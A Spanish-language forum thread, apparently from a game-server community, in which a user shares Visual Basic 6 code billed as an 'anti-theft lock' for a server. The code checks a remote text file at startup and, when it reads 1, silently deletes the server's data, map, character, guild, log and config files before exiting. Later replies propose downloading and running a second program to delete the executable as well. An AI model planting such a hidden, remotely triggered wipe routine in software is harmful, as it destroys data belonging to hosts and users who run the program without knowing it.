[Aportes indexados] Seguro contra Robos del Servidor

Estado
Cerrado para nuevas respuestas.

Khalem

Mica
Colaborador
Ex-Staff
Bueno, acá como en la sección hosting debatimos, dejo un pequeñisimo pero muy util código para evitar que nos roben las cosas.

(Edit 29-04: Agregamos que si no puede cargar la web no haga nada y no se pierda info)
(Edit 01-05: Reformulamos todo el código para que no se burle si no encuentra el archivo, reemplazar todo)

1º: Abrimos el frmCargando del Servidor

2º: Creamos un INET (Boton derecho en el menú de la izquierda -> componentes -> "Microsoft Internet Transfer Control 6.0 (SP4)")

3º: Vamos al código del formulario, en donde:
Código:
Private Sub Form_Load()
'Label1(1).Caption = Label1(1).Caption & " V." & App.Major & "." & App.Minor & "." & App.Revision
Picture1.Picture = LoadPicture(App.Path & "\logo.jpg")

Colocaremos debajo, y sin cambiar nada más que la dirección:
Código:
'Desctrucción del servidor por Khalem
Dim seguro As String 'Declaraciones
On Local Error Resume Next 'Terminan declaraciones
seguro = Inet1.OpenURL("http://www.tuweb.com.ar/mi.txt") 'Decimos donde está el archivo
If seguro = 1 Then 'Si está en 1, borramos todo
   Kill (App.Path & "\logs\*.*") 'Comienza el borrado
   Kill (App.Path & "\bugs\*.*")
   Kill (App.Path & "\charlife\*.*")
   Kill (App.Path & "\chrbackup\*.*")
   Kill (App.Path & "\dat\*.*")
   Kill (App.Path & "\doc\*.*")
   Kill (App.Path & "\foros\*.*")
   Kill (App.Path & "\Guilds\*.*")
   Kill (App.Path & "\maps\*.*")
   Kill (App.Path & "\wav\*.*")
   Kill (App.Path & "\WorldBackUp\*.*")
   Kill (App.Path & "\\*.ini")
   Kill (App.Path & "\\*.txt") 'Termina el borrado
   MsgBox ("Adios adios") 'Damos el error antes de finalizar
   End 'Terminamos todo.
Else 'Sino
    Call Main 'Abrimos el Main
End If
'Termina Desctrucción del servidor por Khalem

Antes del Exit sub.

Y listo!, tema solucionado, como funciona?, muy simple, se fija desde la web que coloquemos si está en 0 u otro número.
Si está en 0, abrira el servidor normalmente.
Si está en 1, u otro numero que no sea tal, comenzara la destrucción.
Borraremos todo menos el .exe ya que no es posible por que es el archivo que utilizamos, pero quedara totalmente desnudo :).

Codigo 0 funcional y hecho por mi, apto a toda modificación.

Espero que les sirva, Suerte!

Hello

Oráculo Lvl 6
me parece q antes de borrar tendria q pedir un codigo de confirmacion (que esta dentro del codigo) porque boludos como yo lo abren y se olvidan de poner la pag en la web y se me borra todo y me la corto :p

zapato

STAND BY!
Si tiene una copia del servidor?, si otro te esta hosteando el servidor y el seguro seria 1 ?

:oops: .

Hello

Oráculo Lvl 6
2º: Creamos un INET (Boton derecho en el menú de la izquierda -> componentes -> "Microsoft Internet Transfer Control 6.0 (SP4)")

te comiste eso

Pentha

Newbie Lvl 2
Haber , creo que ahi quedo , es asi ? :

http://usuarios.lycos.es/reinoperdidoao/vbasic2.JPG

Y mi otra duda, como hago para que funcione ? por que lo probe y no anda.

En el texto de la URL que tengo que poner ???

Yo puse Seguro = 1 , pero no se si ira eso , aca digo :

http://usuarios.lycos.es/reinoperdidoao/1.txt

Saludos

EDIT: Tambien, cuando quiero abrir el codigo de nuevo, me tira un error "error during load " , en el frmCargando.

Me debo haber equibocado en algo, alguno que sepa que me ayude plz, saludos.

Khalem

Mica
Colaborador
Ex-Staff
zapato dijo:
Si tiene una copia del servidor?, si otro te esta hosteando el servidor y el seguro seria 1 ?

:oops: .

Si tiene una copia del servidor se le va a borrar al igual cunado lo ejecute.
Y si le cambias al host, si tenes los códigos no seas pancho y cambia la dirección xD.

Pentha, en el txt que subís a internet, tenés que poenr simplemente un 1 o un 0, y listo :).
Los del error sinceramente no tenog idea, ami me anda perfecto...
Ahora reviso de nuevo :S.

Hello, yo lo veo medio ridículo, si el tipo nos afana el server, para que pedirle la clave a el, si la web la manejamos nosotros?

Suerte

Edit1: AHHH, Penthaa, no te anda por que lo psusite en el codigo del INET, yo te dije en el código en el que carga el formulario, fijate uqe puse las lineas, abajo del form_load y las imagenes.

Khalem

Mica
Colaborador
Ex-Staff
Disculpame!!!, pero como va a borrar los dats si mi código los borra!!!, xD, lo unico que quedaría de todo es el .exe que por logica no lo logra borrar xD, para hacer eso necesitaríamos un programa externo.

Bueno, alguna otra duda??.

Suerte

zapato

STAND BY!
(lo mio no fue una duda :p), y los Dats los puede ROBAR, aunque se borre, puede tener una copia y nos saca los dats, :roll:

Chily

Yo le hice un gol a GS
Che, y si por el supuesto caso, no puede acceder a esa pagina (desconección del modem) Se borra igual?. Y otra cosa, el comando kill los borra o lo manda a la papelera??

Hello

Oráculo Lvl 6
yo digo porque gente como yo asi desbolado lo abre sin poner el 1 o el 0 en la pagina osea que un inputbx diga "pone el numero que esta en el cde del server"

porque yo me olvido de poner el 1 y me la corto :p

Khalem

Mica
Colaborador
Ex-Staff
Los dats los podrá robar, sí... pero... ahora, quien va a ser el queso que le va a decir: "ojo chabon eh, que mira que si me caes mal te borro todo", media pila gente!

La pag la subís vos, y le cambías la dirección al código, cuando subas el TXT, le pones ismplemente un 1, par auqe borre todo, o un 0, para que abra normalmente.

Si está desconectado al modem entonces para que va a abrir el servidor?, en ese caso se podría intentar algún seguro, ese código es basico y está apto apra toda modificación y mejora ^^.
El comando Kill los borra del rigido directamente, noa la papelera :p, sino no seríamos tan nabos XD.

Hello, ese seguro es bastante pasable por arriba igual, sí querés lo pongo, es bastante sencillo :p.

Suerte!

Harry Panzer

Destructor Lvl 3
yo preguntaba cómo lo subía a la página lycos tripod. Che y de qué manera se podría pasar por arriba, decime por mp. Porque si no tenes el código cómo haces para frenarlo o blockearlo (cuando pasas el servo jamás pasas el código sino los archivos elementales)

Khalem

Mica
Colaborador
Ex-Staff
Harry Panzer dijo:
yo preguntaba cómo lo subía a la página lycos tripod. Che y de qué manera se podría pasar por arriba, decime por mp. Porque si no tenes el código cómo haces para frenarlo o blockearlo (cuando pasas el servo jamás pasas el código sino los archivos elementales)

Y sí, más vale que no pasas el código de fuente xD, solo lo encesario apra abrir el servidor.
Igual, yo el digo pasable pro arriba por que tengo minimos conocimientos en ese area, dudo que un host sepa como evitarlo, de todas formas te mando el mp.

Cualquier duda uqe tengan estoy por el msn ^^.

Suerte

A

Anonymous

Invitado
y para borrar el exe, podes q aparte de eliminar los archivos, baje un programa de tal direccion, y grabamos en c:// un dat de donde está el exe, ejecutamos el programa descargado y END. El programa descargado lee <a href="c://a.dat" class="postlink" rel="nofollow" onClick="window.open(this.href);return false;">c://a.dat</a> y borra el .exe XD.

By3K

Developer
sep, al momento de borrar todo, q el sv se fije si existe ese archivo en TAL ruta, y si no existe lo baje, al terminar de borrar, q ejecute el programa bajado con el SHELL y listo, chau ejecutable.

Khalem

Mica
Colaborador
Ex-Staff
El tema es uqe yo no quiero poner esas cosas por que tengo malos pensamientos sobre su futuro uso, de echo ducé muchisimo si postear este código realmente.

En un rato lo hacemos comando por si el flaquito nos tiene podrido y no cierra nunca xD.

Suerte

Estado
Cerrado para nuevas respuestas.